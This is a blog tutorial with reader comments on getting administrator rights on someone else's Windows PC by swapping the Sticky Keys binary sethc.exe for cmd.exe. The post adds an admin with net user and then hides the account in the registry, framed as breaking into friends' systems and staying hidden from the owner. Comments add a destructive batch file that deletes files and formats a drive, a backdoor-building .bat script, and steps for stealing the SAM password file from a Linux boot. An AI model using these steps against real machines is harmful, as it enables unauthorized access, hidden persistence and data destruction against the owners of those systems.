Gain admin access on Windows using your guest account

Gain admin access on Windows using your guest account

Hello All,

Ever thought of how to get into your friend’s system and see the access denied files and folders? Or ever wanted to hack into someone’s admin account? Well here is a method which exploits yet another windows bug.

  1. Have you ever noticed that if you press your system’s SHIFT key >= 5 times continuously a pop-up Windows occurs with the name “Sticky Keys”? If it doesn’t pop up on your comp, then maybe your shortcut is turned off. For enabling it, go to Control
    Panel -> Accessibility Options
    . In the accessibility options under the
    keyboard tab, in sticky keys, click on settings and enable the
    shortcut for sticky keys. And u can do this even with a guest account.
  2. Finally, if the following 2 requirements are set up on your system, then you are all set to enter into your admin’s account.
  • On Pressing SHIFT >= 5 times, a pop up should appear.
  • The windows System32 directory should be writable.

When u press, the SHIFT key >= 5 times, a file with the name “sethc.exe” is
executed.  You can verify this in TASK manager (don’t close the pop-up
window). This file is located in C:WINDOWSsystem32 folder, or
where ever your windows is installed.

Gain admin access on windows system using your guest account

The Vulnerability

  1. When SHIFT key is pressed >=5 times, windows executes a file named
    “sethc.exe” located in the system32 folder. It doesn’t even check if its the
    same file. Also, it runs with the privilege of the CURRENT USER
    which is executing the file i.e if u have logged on as a guest then in
    the TASK manager under processes, it shows your user name as a guest.
  2. The file executes even if u log off, and have the windows login screen is

If u understand this much, then the exploitation is very simple for you. What we will do is that we
pick cmd.exe , copy it at a folder other than system32, (because windows
won’t allow u to copy) rename it to sethc.exe, go tothe system32 folder,
and paste it. Windows will ask, “that another file exists, do u want to
replace?” and after pressing OK, you have replaced the sethc.exe with ur own
cmd.exe. Now if u press SHIFT key >=5 times, a command prompt will

Gain admin access on windows system using your guest account
Gain admin access on windows system using your guest account


  1. Now log-off or restart. When you reach the windows
    login screen, press the shift key >=5 times. A command prompt will
    pop up with SYSTEM privilege.
  2. Enter the normal commands as follows:
  3. net user username /add
  4. net user localgroup administrators username /add
  5. And a new user called username with admin privilege will be added.

And thats it, you have admin privilege of the system and you can do what ever you want to with it.

Hiding your fake admin profile
Now you surely don’t want the real admin to track you. Here is what you will have to do to hide yourself from login screens as well as from control panel

  1. Goto registry editor and open this place.
  2. [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]
  3. Here create a new DWORD value, write its name as the “user name” that u created for your admin account.

Thats it now you are invisible but still admin of the system. Live as admin forever and keep screwing the real admin forever.

Gain admin access on windows system using your guest account
Gain admin access on windows system using your guest account
Gain admin access on windows system using your guest account

Last but not the least (IMPORTANT)
Windows has two type of login screens:

  1. Where the accounts are listed with some pictures.
  2. Where u have to write username and password.

After making the hidden account u will have to login through the 2nd step only. If ur login screen is of Type 1, press ALT-CTRL-DEL twice to get the 2nd type screen.

Thats it!!!

This is a sureshot way to gain admin, if u r a lamer or a newbie
then please do some googling.
I have written almost every detail.

Thanks for reading this far 🙂 Make a comment if you liked this one.

Thanks for digging and shouting it out to your friends.


  1. truly

    nice one,,,,but i already knew this stuff 😀 ,,,,wud b nice and more inetresting if you get into .bat files….they are nice and u can help people making thr own virus….i tried a few and tried thm on my system and ended up at a position whr FORMAT was the only solution 😛 …..

  2. Hi Truly,

    First of all thanks for your comment.

    Well .bat files are not the best ways to do it. What I have described here is a clean and neat process. Tried it several times on my system with no problem what so ever. Do give a try in your free time and i m sure this won’t force you for a re-format.

  3. aah…cool will surely try to find a hack using them, though there exists a lot using them.

    Why don’t you chip in with a few posts if you have any idea of how to use these .bat files to gain such admin access, I will acknowledge you for the same 😛

  4. truly

    i hav made a couple of bat files but i think no one wanna try thm coz the result u know,,,,,and they were not for hacking into acct rather they were meant to be used to fuck the data…. 😀 which i tried and yes i got fucked ,,,, so if u want i can write a post and tell people how to go ahead for this 😛

  5. truly

    yeah very true




    ECHO This is a batch file




    DEL PATH*.*


    FORMAT E: /U



  6. Pingback: Huge windows vulnerability

  7. Indrajeet

    Its quite surprising that a guest will have write permissions to the System32 folder and that too to overwrite an already existent command because the paste function is invoked with guest privileges. I don’t have a windows machine here but would have loved to try this out and have a nice laugh at windows security.

  8. Yes as I said the two requirements for this to succeed are that:

    1. System32 is writable
    2. Sticky keys enabled

    I have the snapshots above which I have copied from the trackback link to this blog post. Enjoy !

  9. tushar ..

    mast hai yaar jhantu and truley …
    didn’t knew this stuff ……
    or even thought about it ,,
    all i knew was 1 thing while playing if
    sticky key was kept on the further game was
    surely screwed !!!!!!!

  10. matthews

    truly you should make a .bat that installs sp3 firefox and avg removes malware etc then we would have a quick technician script you can run as admin without hassling the user and we can have it delete the account when its done. Hack your way to security

  11. matthews

    @ admin I’ve been a linux user for a while Mint is good if your hardware is supported. I dual booted for a year but I don’t want Vista on my new machine and the price of xp was outrageous. At any rate I find Linux usable but the think I miss most is the software aisle.

  12. Well I use Windows XP one of my lappy and Vista on the other. I must confess both sucks, but still makes day to day life easy. Regarding linux, I use Ubuntu using VMWare on windows itself. Plus all my web servers are linux, hence I do enjoy linux too…..

    But i understand the software aisle you are talking abt.

  13. zeebo

    I’m confused about finding a cmd.exe and copying it without finding it in the system32 folder. I can’t find it anywhere else. Can anyone tell me how to do it. Sorry for the newb question 🙂

  14. Didn’t you find that in your system32 folder? Thats in the system32 folder for all the windows version as far as I know.


    Put the above in your browser and it will prompt you for saving the same. Save it on your desktop, make the necessary changes and hurray 😉

  15. Robbie Mosaic Fan

    Ah… Yes, I use this exploitation to play with my computer (and once a computer in the university lab). Also the way to prevent this exploitation is to use NTFS and doesn’t allow normal users modify executable files, especially those used by Administrators.

  16. First of all thanks a lot sree for the comments, that will satisfy a few of the above commentors.

    @jon , well I guess Sree’s comment will satisfy your question ( wtf 😉 )

    However I do agree that in office its unlikely that you will get the system32 writable but then use this trick to hack you friends computer if not the office one. You will be able to do all this on personal computers where they really don’t care to make system32 un-writtable.

  17. noone

    Problem. guest accounts disabled in winxp. users and pwrusers group only have read and exec priveledges, as with EVERY tut about gainingi system or admin access, this one is no different, if there are no priveledges to modify then you cannot apply any work around. This is a neat trick, but of course, you have to have the modify attribute set in the group that your login is assigned to.

  18. Well I don’t think it is possible unless your guest account has the required privilege. I used this technique generally on my friends computer where I am logged in already as admin. I set the whole thing up and then simply try out later when he is not thr 😛

    If you are trying to hack through your Computer Center or something of the sort, I am afraid that you can’t make system32 writable from guest account.

  19. FrereOP

    You can gain access to the Windows System account (higher up than Administrator) then use this account to change the read/write privileges in the System32 directory.  Be careful as the System account is the equivalent of a LINUX root account and you can easily stuff your system! Presumably you could also add users from here but the less you use this account the better!

    Search Google to find out how to gain access to the System account using the “at” command.

  20. anarchist

    Ahoy! I have the same problem. The message what I get says:
    Cannot copy sethc.exe: Access is denied.

    Make sure the disk is not full or write-protected and that the file is not currently in use.

  21. FrereOP

    Accounts with” Use”r privileges (including the Guest accout) do not have write access to System32 and some programs (Execute privileges) are disabled as well including the “at” command” which is the key to getting to the System account.  This will give an “Access is Denied” error.

    However, accounts with “Power User” privileges do have execute access and will work.

  22. FrereOP

    If you are really stuck (you have a User rather than a Power User or Administrator account), then resort to LINUX for help.  If you can boot a LINUX live CD such as Ubuntu, you can do it in situ.  If booting from a CD has been disabled in BIOS you may be able to re-enable it but if the BIOS is locked as well and you can’t, you will have to physically remove the hard disk to another machine that can boot a CD from.
    Use the LINUX distro to do the replacement of sethc.exe with cmd.exe in the system32 directory.  A LINUX root account will not honour the ownership prievileges of your NTFS disk although it may honour the read-write/read-only status of the file.

  23. linuser

    thanks everyone for their tips.
    Abhinav yaar can u plz share how u got this webpage…. i mean are u hosting on your own comp.. or on other server.

    I am planning for a webpage but not getting a head start…. 🙁

  24. XP USER

    I tried to do all what you gave me but the sethc.exe I replaced with cmd.exe after renaming failed to work when I restarted the machine the cmd prompt and the logon screen said the syntax of this command is NET USER and failed to work

  25. Needshelp

    its not letting me copy sethc (cmd) to system32: it says: Cannot copy sethc: Access denied. Make sure the disk is not full or write-protected and that the file is not currently in use. Plz help me out.

  26. ZAC

    ok so when i go into systum32 and find the file it says “sethc” only there is no “.exe” at the end. so do i just re name the cmd file as just “sythc” or am i screw? please reaspon asp ty 🙂

  27. Pingback: How to hack administrator password from GUEST account

  28. Jack

    Hey, i tested this out on my computer and once i copy the cmd.exe to another folder and rename it, it wont let me place it in the system32 folder and says i need administrator access for that. Is there a way to circumvent this access request or did they fix this windows bug? any help you can give me would be greatly appreciated

  29. Hi Friends,
    Nice Post,I am also interested in learning
    ethical hacking and finding out the security loopholes in OS,network and fixing them up. I recently did a course on ethical hacking from, this course gave me detailed insight of hacking,learning and training. I would recommend to do this course for everyone interested in networking security and ethical hacking. They also run linux,java courses and also have online and distance learning program.


  30. Vikash

    Yar pls help me cannot replcaHow to fix this pls help its urgent “Cannot copy sethc: Access denied. Make sure the disk is not full or write-protected and that the file is not currently in use”

    pls help anyone

  31. Shashikant


    “What we will do is that,
    we pick cmd.exe , copy it at a folder other than system32, (because windows
    won’t allow u to copy) rename it to sethc.exe, go to system32 folder,
    and paste it. Windows will ask, “that another file exists, do u want to
    replace?” and after pressing OK, you have replaced the sethc.exe with ur own
    cmd.exe. ”

    How can copy and replace the sethc.exe after renaming cmd.exe to sethc.exe file in Windows/system32 directory as a guest.
    It says “Access is denied”.

  32. akil

    hey buddy dont mess up evrybudy.;System32 isn’t writeable from a guest account. If you have privileges to change System32 to being writeable, you already have admin access so wtf is the point of this?.jon is absolutely correct,;the trick is clear and good but of no use.;you cant even perform with power users;i tried it,anybody will get message like;access denied….
    dont waste time , go find another place…..

  33. john

    Very cool. Just have a small query..if I add files to guest account,do they automatically get added to the admin a/c aswell? If they get deleted when I delete em frm the guest a/c?

    1. Kevin

      If I wanted to remove the cmd shortcut so that any trace of tampering could be removed, could i just replace the cmd (renamed sethc.exe) with the original sethc.exe which I copied onto my flash drive? After i created a new admin, of course 🙂

    2. Bat file for making backdoor
      cd windows
      cd system32
      copy cmd.exe d:
      ren cmd.exe sethc.exe
      cd windows
      cd system32
      ren sethc.exe my.exe
      copy sethc.exe C:WindowsSystem32
      @echo Backdoor have been Created
      @echo You can change it By command as – NET USER *

      now save it as .bat extension and it will make a backdoor on ur xp logon screen by just press shift 5 times…

  34. MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    U can download this bootable iso.””(only 3 mb its zipped)..create a bootable usb drive(u can use Unetbootin or YUMI) and boot via it and clear the administrator password from the computer u wanna use n abracadabra!no password needed to log in to admin..u can access anythn u want

  35. MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    U can download this bootable iso.””(only 3 mb its zipped)..create a bootable usb drive(u can use Unetbootin or YUMI) and boot via it and clear the administrator password from the computer u wanna use n abracadabra!no password needed to log in to admin..u can access anythn u want

  36. MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    U can download this bootable iso.href=”” its only 3 mb then create a bootable usb drive(u can use Unetbootin or YUMI) and boot via it and clear the administrator password from the computer u wanna use n abracadabra!no password needed to log in to admin..u can access anythn u want

  37. Mr.Singh

    The information provided by you is really intresting and new for me, but there is one problem that came in front of me when i tried to change the administrator password using guest account.When i logged in using a guest account it the SYSTEM32 folder becomes read only and windows don’t allow me to make any changes in system32 folder due to which i cannot replace the SCTCH.EXE file .

    Please reply me the solution what i can i do to change the password of admin using guest account. As, the SYSTEM#@ is only read only.

    Thanks in advance

  38. et phone home

    this hack does not work for computers with high security, I tried every way to get the files to go in to system32 but get access denied for copying WTF. Apparently the admins know of this hack and have protected the computers, the sethc.exe does not even show up in the system32 i had to search it.

  39. Hello, this hack is too old now and you should update it.. and also, only few systems would allow Guest accounts to overwrite system32 files…
    you can try this …

    1. Download Ubuntu or any linux with GUI (for noob purposes) Ubuntu 11.04 or 10.04 would do.
    2. Install it on a USB thumb drive using either unetbootin or universal installer from pendrivelinux
    3. boot from the USB drive
    4. a window would ask you if you want to install ubuntu or try it. select try it.
    5. goto HOME folder.
    6. in the upper left side of the window, you could see Mounted drives, select the first drive in the list. take note, it would have an icon of a hard drive.
    7. double click that.
    8. if you saw a folder named Windows, that’s the drive we want, if not, try the others in the list.
    9. in the drive we selected,
    GOTO Windows> System32
    10. now find CMD.exe, copy it and paste it on the desktop, rename it SETHC.exe
    11. then drag the renamed CMD.exe from the desktop to the folder System32.
    you would be ask if you want to overwrite the existing SETHC.exe, click Yes to confirm.
    12. Reboot. the hack would now be possible.

    you can press the shift key, 5 times to bring out the Command prompt

    (this would only possible if you successfully followed what i have said earlier. IT’S 100% WORKING, TRIED AND TESTED ON DIFFERENT SYSTEMS, INCLUDING NETWORKED COMPUTERS FROM COLLEGE UNIVERSITIES) ^_^ thankx

  40. Omega.

    Hey all of you,
    First of all the system file does’nt get replaced.Someone help me wid [email protected] as you asked what message comes and provide some info about dat it comes access is denied.The file is being used by someone else.Dats what comes.Please help me.

  41. noob

    when i tried to copy the sethc.exe into system32 it said I needed the admin password which is a real problem for me because I am only doing this cuz I changed my password a while ago and forgot what it was so I need to use “net user administration *” to change my password

  42. prakash

    just follow MullahCrazedNiccuh idea of booting with llinux from USB and copy the SAM(the file where windows store all users password) file located in windowssystem32config copy it, paste it anywhere, eg: pendrive,. open the SAM file after you reboot the computer then you will find a long code then u can google it to decode it into plain text….

    1. Aniruddh Agarwal

      Worked like a charm with the Linux method! My little brother forgot the password of the only account of his PC, but fortunately he still had a guest account with which I activated Sticky Keys. The rest was done by Linux!

  43. Diell Morina

    Hey, everything’s good, but the I can’t turn on the fuckin sticky keys!! I can change it by Eease of Access nor by Narrator before loggin’ in(when you have to choose which user you want to log in). When I turn it on from Ease of Access it doesn’t do anything, even though I press sticky keys like 1000000000 times. Also when I try to do it by he Ease of Acces(narrator thingy)before loggin in, it pops up a message”error starting sound agent. There may be no sounds for FilterKeys or StickyKeys”, and doesn’t let me press OK and change the pass’.

    Please help!

  44. Verity

    Hey, i’m trying this because i forgot my admin password and my guest account doesn’t let me download anything. I’ve done everything, but the last couple of steps aren’t working. I’ve typed “net user username/add” and entered and then “net user localgroup administrators username/add” But no new user has been added?:| help

  45. Bob

    A few days ago, I had met the headache things that I had forgotten Windows login password. The login screen rejected my passwords. I was frustrated because there was very important data on my disk and I couldn’t reinstall the OS. ………….
    However, I fortunately got to know the PCUnlocker utility, which is a professional windows password recovery tool for us to reset windows password instantly yet no data loss.

  46. Jonathan Cauthorn

    Correction to this step:
    net user localgroup administrators username /add
    should remove the “user” and should read:
    net localgroup administrators username /add

    Simple typo.

  47. Nurul Hidayati

    okay, i’m having this problem
    I have a computer but the admin is my brother, he put parental control that only allows me to open my pc for few hours and then it locked by itself years ago and still don’t want to give me his password. I can’t do anything with this PC, from downloading games, songs and videos from Internet to even copy and paste my documents. I can’t even do anything with it and just even thinking of it makes me want to smash it to pieces. Is there any ways to remove my brother’s admin password or account without using Password Reset CD or USB drive, I mean just from the guest account. I know just from the sound of it, is quite impossible but please help. I don’t want to reboot or anything

  48. Kitale Nudeet


    Apr 09, 2014

    the “renaming” way on the 1st method doesn’t work and most of people see this too!

    “Cannot move sethc.exe(to System32): Acess is denied
    Make sure the disk is not full or write-protected
    and that the file is not currently in use.”

    But I know how to fix this!

    1. Turn on the Computer then force it to turn off.

    2. Turn it on again and it will ask you to launch “Safe Mode”, “Safe Mode with Networking”, “Safe Mode with Command Prompt” and “Start Windows Normally”. Choose “Start Windows Normally”. Then quickly hit “Ctrl+Alt+Delete” and the system will restart.

    3. It will have only two choice for you to choose is
    “Launch Startup Repair” and “Start Windows Normally”. Now choose “Launch Startup Repair”.

    4. Wait for Windows’s stuffs to load and a dialog will pop up to ask you like this. “Do you want to restore your computer using system restore?” choose Cancel. And a bit later another dialog will pop up saying “Startup repair cannot repair this computer automatically”. If this doesn’t pop up so do step 2, 3, 4 again

    5. The dialog will ask you to “Send information about this problem”, “Don’t send” and the important part is “View problem details”. So ofcourse, Click on the drop down in front of “View problem details” and scroll down to the bottom part and it is a local link Similar to this “C:/Windows/System32/en-US/erofflps.txt” click on it

    6. Bang!! it opens up a text document in notepad. (it’s more and more exiting) click at “File” then “Open” or just press “Ctrl+O” and it is a file explorer!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    7. Locate the folder C:/Windows/System32 and find cmd.exe but you actually can’t find it! Why?!!! Oh no! Don’t be worry bloodstriker can help you. Look at the bottom of the file explorer it is a dropdown list called “Files Type”. Change it to “All Files”. Now copy and paste “cmd.exe”. Rename “sethc.exe” to any thing you want and rename “cmd – Copy.exe” to “sethc.exe”

    8. Happy ending click “Cancel” next close Notepad then click “Don’t Send” and click “Finish” The system will restart and do step 5-9 in this tutorial and Bravo!!

    Read more:

  49. Jonathan Cauthorn

    Correct Registry key:

    HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList


    “The value of 0 hides the user account from the welcome screen. However the user account is still visible under the control panel. The value of 1 shows the user on the welcome screen. The last possible values is 65536 (0x10000). That value hides the user account as well from the welcome screen as well as from the control panel.” – Norbert Willhelm

  50. snipe

    …except the guest account can’t replace or rename, OR delete files in the system32 folder, nor can they write to the registry. So this entire tutorial is pointless.

    also it’s spelled ‘you’ not ‘u’

  51. Cam Wirtz-Fielding

    ah windows 7 was so exploitable. Admin and school laptops almost all now use windows 10 + the school IT departments are usually pretty damn smart nowadays. i remember when i gained access to system 32 couple years ago on windows 10, and i was about to create a new profile, however it denied access. they’ve
    upper their game. quite tricky to bypass this shit nowadays.

Leave a Reply